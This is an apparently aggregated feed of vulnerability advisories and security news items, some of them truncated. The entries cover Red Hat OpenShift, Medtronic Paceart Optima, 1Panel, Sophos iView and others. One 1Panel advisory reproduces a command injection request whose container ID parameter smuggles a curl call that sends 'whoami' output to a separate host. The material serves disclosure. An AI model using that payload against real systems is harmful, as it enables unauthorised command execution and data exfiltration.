#windows

Red Hat OpenShift Container Platform release 4.12.23 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-3089: A compliance problem was found in the Red Hat OpenShift Container Platform. Red Hat discovered that, when FIPS mode was enabled, not all of the cryptographic modules in use were FIPS-...

Archon CMS version 3.14 suffers from a cross site scripting vulnerability.

Categories: Exploits and vulnerabilities Categories: News Tags: Medtronic Tags: Paceart Optima Tags: CVE-2023-31222 Tags: deserialization Tags: update Tags: messaging A vulnerability in Medtronic's Paceart Optima cardiac device could lead to further network penetration, RCE, and DoS attacks (Read more...) The post Warning issued over vulnerability in cardiac devices appeared first on Malwarebytes Labs.

### Impact The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal. 1. Vulnerability analysis. ``` backend\app\api\v1\terminal.go#ContainerWsSsh ```  2. vulnerability reproduction. ``` GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Sec-WebSocket-Version: 13 Origin: http://192.168.109.152:40982 Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ== Connection: keep-alive, Upgrade Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e Pragma: no-cache Cache-Control: no-cache Upgrade: websocket ``` 3. The su...

### Impact The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. 1. Vulnerability analysis. ``` backend\app\api\v1\image_repo.go#create ```  ``` backend\app\service\image_repo.go#CheckConn ```  2. vulnerability reproduction. ``` POST /api/v1/containers/repo HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-CSRF-TOKEN: Content-Length: 446 Origin: http://192.168.109.152:40982 Connection: close Referer: http://192.168.109.152:40982/containers/repo Cookie: rem-username=admin; psession...

1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal. The vulnerability has been fixed in v1.3.6.

In MADEFORNET HTTP Debugger through 9.12, the Windows service does not set the seclevel registry key before launching the driver. Thus, it is possible for an unprivileged application to obtain a handle to the NetFilterSDK wrapper before the service obtains exclusive access.

Cross Site Scripting (XSS) in Sophos Sophos iView (The EOL was December 31st 2020) in grpname parameter that allows arbitrary script to be executed.

Due to some design problems in how transactions are implemented in the registry, it is possible for a low-privileged local attacker to force a non-atomic outcome of a transaction used by another high-privileged process in the system.

Beauty Salon Management System version 1.0 suffers from a remote SQL injection vulnerability.